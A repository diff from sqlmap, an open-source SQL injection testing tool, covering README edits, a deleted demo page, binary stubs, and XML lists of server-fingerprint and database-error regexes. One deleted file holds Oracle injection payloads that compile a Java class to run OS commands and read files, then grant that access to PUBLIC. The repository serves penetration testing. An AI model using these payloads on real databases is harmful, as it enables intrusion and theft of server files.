|
||||||
|
|
||||||
You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.
|
You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
|
||||||
|
|
||||||
Installation
|
Installation
|
||||||
----
|
----
|
||||||
@@ -20,7 +22,7 @@ Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlm
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
|
sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
|
||||||
|
|
||||||
Usage
|
Usage
|
||||||
----
|
----
|
||||||
@@ -34,19 +36,19 @@ To get a list of all options and switches use:
|
|||||||
python sqlmap.py -hh
|
python sqlmap.py -hh
|
||||||
|
|
||||||
You can find a sample run [here](https://asciinema.org/a/46601).
|
You can find a sample run [here](https://asciinema.org/a/46601).
|
||||||
To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
Links
|
Links
|
||||||
----
|
----
|
||||||
|
|
||||||
* Homepage: https://sqlmap.org
|
* Homepage: http://sqlmap.org
|
||||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
|
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|
||||||
Translations
|
Translations
|
||||||
@@ -55,21 +57,13 @@ Translations
|
|||||||
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
|
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
|
||||||
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||||
* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
|
|
||||||
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
||||||
* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
|
|
||||||
* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
|
|
||||||
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||||
* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
|
|
||||||
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
|
|
||||||
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||||
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
||||||
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
|
|
||||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||||
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
|
|
||||||
* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
|
|
||||||
|
|||||||
@@ -1,151 +0,0 @@
|
|||||||
<!DOCTYPE html>
|
|
||||||
|
|
||||||
<!-- https://angrytools.com/bootstrap/editor/ -->
|
|
||||||
|
|
||||||
<html lang="en">
|
|
||||||
<head>
|
|
||||||
<title>DEMO</title>
|
|
||||||
<meta charset="utf-8">
|
|
||||||
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
|
||||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
||||||
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
|
|
||||||
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css" rel="stylesheet">
|
|
||||||
|
|
||||||
<!--[if lt IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
|
|
||||||
</head>
|
|
||||||
<body>
|
|
||||||
<style>
|
|
||||||
#wrapper { width: 100%; }
|
|
||||||
|
|
||||||
#page-wrapper {
|
|
||||||
padding: 0 15px;
|
|
||||||
min-height: 568px;
|
|
||||||
background-color: #fff;
|
|
||||||
}
|
|
||||||
|
|
||||||
@media(min-width:768px) {
|
|
||||||
#page-wrapper {
|
|
||||||
position: inherit;
|
|
||||||
margin: 0 0 0 250px;
|
|
||||||
padding: 0 30px;
|
|
||||||
border-left: 1px solid #e7e7e7;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
.sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }
|
|
||||||
.sidebar .sidebar-search { padding: 15px; }
|
|
||||||
.sidebar ul li { border-bottom: 1px solid #e7e7e7; }
|
|
||||||
|
|
||||||
.sidebar ul li a.active { background-color: #eee; }
|
|
||||||
|
|
||||||
.sidebar .arrow { float: right;}
|
|
||||||
.sidebar .fa.arrow:before { content: "f104";}
|
|
||||||
.sidebar .active>a>.fa.arrow:before { content: "f107"; }
|
|
||||||
.sidebar .nav-second-level li,
|
|
||||||
.sidebar .nav-third-level li {
|
|
||||||
border-bottom: 0!important;
|
|
||||||
}
|
|
||||||
|
|
||||||
.sidebar .nav-second-level li a { padding-left: 37px; }
|
|
||||||
.sidebar .nav-third-level li a { padding-left: 52px; }
|
|
||||||
|
|
||||||
@media(min-width:768px) {
|
|
||||||
.sidebar {
|
|
||||||
z-index: 1;
|
|
||||||
position: absolute;
|
|
||||||
width: 250px;
|
|
||||||
margin-top: 51px;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
</style>
|
|
||||||
<div id="wrapper">
|
|
||||||
|
|
||||||
<nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
|
|
||||||
<div class="navbar-header">
|
|
||||||
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
|
|
||||||
<span class="sr-only">Toggle navigation</span>
|
|
||||||
<span class="icon-bar"></span>
|
|
||||||
<span class="icon-bar"></span>
|
|
||||||
<span class="icon-bar"></span>
|
|
||||||
</button>
|
|
||||||
<a class="navbar-brand" href="index.html">sqlmap</a>
|
|
||||||
</div>
|
|
||||||
|
|
||||||
<div class="navbar-default sidebar" role="navigation">
|
|
||||||
<div class="sidebar-nav navbar-collapse">
|
|
||||||
<ul class="nav" id="side-menu">
|
|
||||||
<li>
|
|
||||||
<a href="#"><em class="glyphicon glyphicon-home"></em> Options<span class="arrow"></span></a>
|
|
||||||
<ul class="nav nav-second-level">
|
|
||||||
<li><a>Target</a></li>
|
|
||||||
<li><a>Request</a></li>
|
|
||||||
<li><a>Optimization</a></li>
|
|
||||||
<li><a>Injection</a></li>
|
|
||||||
<li><a>Detection</a></li>
|
|
||||||
<li><a>Techniques</a></li>
|
|
||||||
<li><a>Fingerprint</a></li>
|
|
||||||
<li><a>Enumeration</a></li>
|
|
||||||
<li><a>Brute force</a></li>
|
|
||||||
<li><a>User-defined function injection</a></li>
|
|
||||||
<li><a>File system access</a></li>
|
|
||||||
<li><a>Operating system access</a></li>
|
|
||||||
<li><a>Windows registry access</a></li>
|
|
||||||
<li><a>General</a></li>
|
|
||||||
<li><a>Miscellaneous</a></li>
|
|
||||||
</ul>
|
|
||||||
</li>
|
|
||||||
</ul>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
</nav>
|
|
||||||
|
|
||||||
<div id="page-wrapper">
|
|
||||||
<div class="row">
|
|
||||||
<h4>DEMO</h4>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
<script>
|
|
||||||
/*
|
|
||||||
* metismenu - v1.0.3
|
|
||||||
* Easy menu jQuery plugin for Twitter Bootstrap 3
|
|
||||||
* https://github.com/onokumus/metisMenu
|
|
||||||
*
|
|
||||||
* Made by Osman Nuri Okumuş
|
|
||||||
* Under MIT License
|
|
||||||
*/
|
|
||||||
!function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e="metisMenu",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find("li.active").has("ul").children("ul").collapse("show"),b.find("li").not(".active").has("ul").children("ul").collapse("hide")):(b.find("li.active").has("ul").children("ul").addClass("collapse in"),b.find("li").not(".active").has("ul").children("ul").addClass("collapse")),b.find("li").has("ul").children("a").on("click",function(b){b.preventDefault(),a(this).parent("li").toggleClass("active").children("ul").collapse("toggle"),c&&a(this).parent("li").siblings().removeClass("active").children("ul.in").collapse("hide")})},isIE:function(){for(var a,b=3,d=c.createElement("div"),e=d.getElementsByTagName("i");d.innerHTML="<!--[if gt IE "+ ++b+"]><i></i><![endif]-->",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,"plugin_"+e)||a.data(this,"plugin_"+e,new d(this,b))})}}(jQuery,window,document);
|
|
||||||
|
|
||||||
$(function() {
|
|
||||||
|
|
||||||
$('#side-menu').metisMenu();
|
|
||||||
|
|
||||||
});
|
|
||||||
|
|
||||||
//Loads the correct sidebar on window load,
|
|
||||||
//collapses the sidebar on window resize.
|
|
||||||
// Sets the min-height of #page-wrapper to window size
|
|
||||||
$(function() {
|
|
||||||
$(window).bind("load resize", function() {
|
|
||||||
topOffset = 50;
|
|
||||||
width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;
|
|
||||||
if (width < 768) {
|
|
||||||
$('div.navbar-collapse').addClass('collapse')
|
|
||||||
topOffset = 100; // 2-row-menu
|
|
||||||
} else {
|
|
||||||
$('div.navbar-collapse').removeClass('collapse')
|
|
||||||
}
|
|
||||||
|
|
||||||
height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;
|
|
||||||
height = height - topOffset;
|
|
||||||
if (height < 1) height = 1;
|
|
||||||
if (height > topOffset) {
|
|
||||||
$("#page-wrapper").css("min-height", (height) + "px");
|
|
||||||
}
|
|
||||||
})
|
|
||||||
});
|
|
||||||
</script>
|
|
||||||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
|
|
||||||
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
|
|
||||||
</body>
|
|
||||||
</html>
|
|
||||||
@@ -1,4 +0,0 @@
|
|||||||
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
|
|
||||||
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
|
|
||||||
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
|
|
||||||
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
|
|
||||||
Binary file not shown.
Binary file not shown.
@@ -1,5 +0,0 @@
|
|||||||
=ÒÂá2nduÌŒ¡d0ÂÔ
õÜ”=YïR$ú×_~±™Ø#tÈ
|
|
||||||
5ßãÀ¾Üc¨= iÏÔA°·^:CS–ö°5i@´±Ûƺ<è/*¸òU%æP4 $™K‰Ú®Û")cúJ7
|
|
||||||
‡‚<EFBFBD>½ŒÓSvÚz lB-'‹•Ùbœg‰W>AóqØ7Yê²Ýõ:ŠÙMI0³ÁÈ®‘TÙÍ<–1Cá–;DÚ:mK(×Þ {Hàsxd™Ÿùq×…lo¿ŒQß•Åâw8¬ÿ’Õ¸›Ï‹§'‘a4Ž£ÍóÌCnõ,0£ó1}wMýÔÆM6dßç“ÑB4Ï/Îxg_<67>¦æFÆ%Á›óáÅI|ÒJ>ù”|µÍfrËœT,OÄâ¥
®P¿¯T¶›Gó?²O9ðBñSáRºC
|
|
||||||
Ò
|
|
||||||
ö‹ö·2}^Þ5<$iãnÀ¨ô“s³Ú¤¾Ñ^9"wí…£°ˆqW†‡–W
|
|
||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,65 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="UTF-8"?>
|
|
||||||
|
|
||||||
<!-- Reference: https://publicwww.com/popular/powered/index.html -->
|
|
||||||
|
|
||||||
<root>
|
|
||||||
<regexp value="PHP[\-\_\/\ ]([\d\.]+)">
|
|
||||||
<info technology="PHP" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="JSP[\-\_\/\ ]([\d\.]+)">
|
|
||||||
<info technology="JSP" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="ASP[\/\d\.]*$">
|
|
||||||
<info technology="ASP" type="Windows"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="EasyEngine ([\d\.]+)">
|
|
||||||
<info technology="EasyEngine" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="Phusion Passenger ([\d\.]+)">
|
|
||||||
<info technology="Phusion Passenger" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="Craft CMS">
|
|
||||||
<info technology="Craft CMS"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="Express">
|
|
||||||
<info technology="Express"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="WP Engine">
|
|
||||||
<info technology="WP Engine"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="PleskLin">
|
|
||||||
<info technology="Plesk" type="Linux"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="PleskWin">
|
|
||||||
<info technology="Plesk" type="Windows"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="ThinkPHP">
|
|
||||||
<info technology="ThinkPHP"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="ASP\.NET">
|
|
||||||
<info technology="ASP.NET" type="Windows"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="Tomcat[\-\_\/\ ]?([\d\.]+)">
|
|
||||||
<info technology="Tomcat" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="JBoss[\-\_\/\ ]?([\d\.]+)">
|
|
||||||
<info technology="JBoss" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
|
|
||||||
<regexp value="Servlet[\-\_\/\ ]?([\d\.]+)">
|
|
||||||
<info technology="Servlet" tech_version="1"/>
|
|
||||||
</regexp>
|
|
||||||
</root>
|
|
||||||
@@ -1,235 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="UTF-8"?>
|
|
||||||
|
|
||||||
<root>
|
|
||||||
<dbms value="MySQL">
|
|
||||||
<error regexp="SQL syntax.*?MySQL"/>
|
|
||||||
<error regexp="Warning.*?\Wmysqli?_"/>
|
|
||||||
<error regexp="MySQLSyntaxErrorException"/>
|
|
||||||
<error regexp="valid MySQL result"/>
|
|
||||||
<error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
|
|
||||||
<error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
|
|
||||||
<error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
|
|
||||||
<error regexp="Unknown column '[^ ]+' in 'field list'"/>
|
|
||||||
<error regexp="MySqlClient\."/>
|
|
||||||
<error regexp="com\.mysql\.jdbc"/>
|
|
||||||
<error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
|
|
||||||
<error regexp="Pdo[./_\\]Mysql"/>
|
|
||||||
<error regexp="MySqlException"/>
|
|
||||||
<error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
|
|
||||||
<error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
|
|
||||||
<error regexp="is not supported by MemSQL" fork="MemSQL"/>
|
|
||||||
<error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="PostgreSQL">
|
|
||||||
<error regexp="PostgreSQL.*?ERROR"/>
|
|
||||||
<error regexp="Warning.*?\Wpg_"/>
|
|
||||||
<error regexp="valid PostgreSQL result"/>
|
|
||||||
<error regexp="Npgsql\."/>
|
|
||||||
<error regexp="PG::SyntaxError:"/>
|
|
||||||
<error regexp="org\.postgresql\.util\.PSQLException"/>
|
|
||||||
<error regexp="ERROR:\s\ssyntax error at or near"/>
|
|
||||||
<error regexp="ERROR: parser: parse error at or near"/>
|
|
||||||
<error regexp="PostgreSQL query failed"/>
|
|
||||||
<error regexp="org\.postgresql\.jdbc"/>
|
|
||||||
<error regexp="Pdo[./_\\]Pgsql"/>
|
|
||||||
<error regexp="PSQLException"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Microsoft SQL Server">
|
|
||||||
<error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
|
|
||||||
<error regexp="OLE DB.*? SQL Server"/>
|
|
||||||
<error regexp="\bSQL Server[^<"]+Driver"/>
|
|
||||||
<error regexp="Warning.*?\W(mssql|sqlsrv)_"/>
|
|
||||||
<error regexp="\bSQL Server[^<"]+[0-9a-fA-F]{8}"/>
|
|
||||||
<error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>
|
|
||||||
<error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>
|
|
||||||
<error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
|
|
||||||
<error regexp="\[SQL Server\]"/>
|
|
||||||
<error regexp="ODBC SQL Server Driver"/>
|
|
||||||
<error regexp="ODBC Driver \d+ for SQL Server"/>
|
|
||||||
<error regexp="SQLServer JDBC Driver"/>
|
|
||||||
<error regexp="com\.jnetdirect\.jsql"/>
|
|
||||||
<error regexp="macromedia\.jdbc\.sqlserver"/>
|
|
||||||
<error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>
|
|
||||||
<error regexp="com\.microsoft\.sqlserver\.jdbc"/>
|
|
||||||
<error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>
|
|
||||||
<error regexp="SQL(Srv|Server)Exception"/>
|
|
||||||
<error regexp="Unclosed quotation mark after the character string"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Microsoft Access">
|
|
||||||
<error regexp="Microsoft Access (\d+ )?Driver"/>
|
|
||||||
<error regexp="JET Database Engine"/>
|
|
||||||
<error regexp="Access Database Engine"/>
|
|
||||||
<error regexp="ODBC Microsoft Access"/>
|
|
||||||
<error regexp="Syntax error \(missing operator\) in query expression"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Oracle">
|
|
||||||
<error regexp="\bORA-\d{5}"/>
|
|
||||||
<error regexp="Oracle error"/>
|
|
||||||
<error regexp="Oracle.*?Driver"/>
|
|
||||||
<error regexp="Warning.*?\W(oci|ora)_"/>
|
|
||||||
<error regexp="quoted string not properly terminated"/>
|
|
||||||
<error regexp="SQL command not properly ended"/>
|
|
||||||
<error regexp="macromedia\.jdbc\.oracle"/>
|
|
||||||
<error regexp="oracle\.jdbc"/>
|
|
||||||
<error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>
|
|
||||||
<error regexp="Pdo[./_\\](Oracle|OCI)"/>
|
|
||||||
<error regexp="OracleException"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="IBM DB2">
|
|
||||||
<error regexp="CLI Driver.*?DB2"/>
|
|
||||||
<error regexp="DB2 SQL error"/>
|
|
||||||
<error regexp="\bdb2_\w+\("/>
|
|
||||||
<error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>
|
|
||||||
<error regexp="com\.ibm\.db2\.jcc"/>
|
|
||||||
<error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
|
|
||||||
<error regexp="Pdo[./_\\]Ibm"/>
|
|
||||||
<error regexp="DB2Exception"/>
|
|
||||||
<error regexp="ibm_db_dbi\.ProgrammingError"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Informix">
|
|
||||||
<error regexp="Warning.*?\Wifx_"/>
|
|
||||||
<error regexp="Exception.*?Informix"/>
|
|
||||||
<error regexp="Informix ODBC Driver"/>
|
|
||||||
<error regexp="ODBC Informix driver"/>
|
|
||||||
<error regexp="com\.informix\.jdbc"/>
|
|
||||||
<error regexp="weblogic\.jdbc\.informix"/>
|
|
||||||
<error regexp="Pdo[./_\\]Informix"/>
|
|
||||||
<error regexp="IfxException"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<!-- Interbase/Firebird -->
|
|
||||||
<dbms value="Firebird">
|
|
||||||
<error regexp="Dynamic SQL Error"/>
|
|
||||||
<error regexp="Warning.*?\Wibase_"/>
|
|
||||||
<error regexp="org\.firebirdsql\.jdbc"/>
|
|
||||||
<error regexp="Pdo[./_\\]Firebird"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="SQLite">
|
|
||||||
<error regexp="SQLite/JDBCDriver"/>
|
|
||||||
<error regexp="SQLite\.Exception"/>
|
|
||||||
<error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
|
|
||||||
<error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>
|
|
||||||
<error regexp="\[SQLITE_ERROR\]"/>
|
|
||||||
<error regexp="SQLite error \d+:"/>
|
|
||||||
<error regexp="sqlite3.OperationalError:"/>
|
|
||||||
<error regexp="SQLite3::SQLException"/>
|
|
||||||
<error regexp="org\.sqlite\.JDBC"/>
|
|
||||||
<error regexp="Pdo[./_\\]Sqlite"/>
|
|
||||||
<error regexp="SQLiteException"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="SAP MaxDB">
|
|
||||||
<error regexp="SQL error.*?POS([0-9]+)"/>
|
|
||||||
<error regexp="Warning.*?\Wmaxdb_"/>
|
|
||||||
<error regexp="DriverSapDB"/>
|
|
||||||
<error regexp="-3014.*?Invalid end of SQL statement"/>
|
|
||||||
<error regexp="com\.sap\.dbtech\.jdbc"/>
|
|
||||||
<error regexp="\[-3008\].*?: Invalid keyword or missing delimiter"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Sybase">
|
|
||||||
<error regexp="Warning.*?\Wsybase_"/>
|
|
||||||
<error regexp="Sybase message"/>
|
|
||||||
<error regexp="Sybase.*?Server message"/>
|
|
||||||
<error regexp="SybSQLException"/>
|
|
||||||
<error regexp="Sybase\.Data\.AseClient"/>
|
|
||||||
<error regexp="com\.sybase\.jdbc"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Ingres">
|
|
||||||
<error regexp="Warning.*?\Wingres_"/>
|
|
||||||
<error regexp="Ingres SQLSTATE"/>
|
|
||||||
<error regexp="Ingres\W.*?Driver"/>
|
|
||||||
<error regexp="com\.ingres\.gcf\.jdbc"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="FrontBase">
|
|
||||||
<error regexp="Exception (condition )?\d+\. Transaction rollback"/>
|
|
||||||
<error regexp="com\.frontbase\.jdbc"/>
|
|
||||||
<error regexp="Syntax error 1. Missing"/>
|
|
||||||
<error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>
|
|
||||||
</dbms>
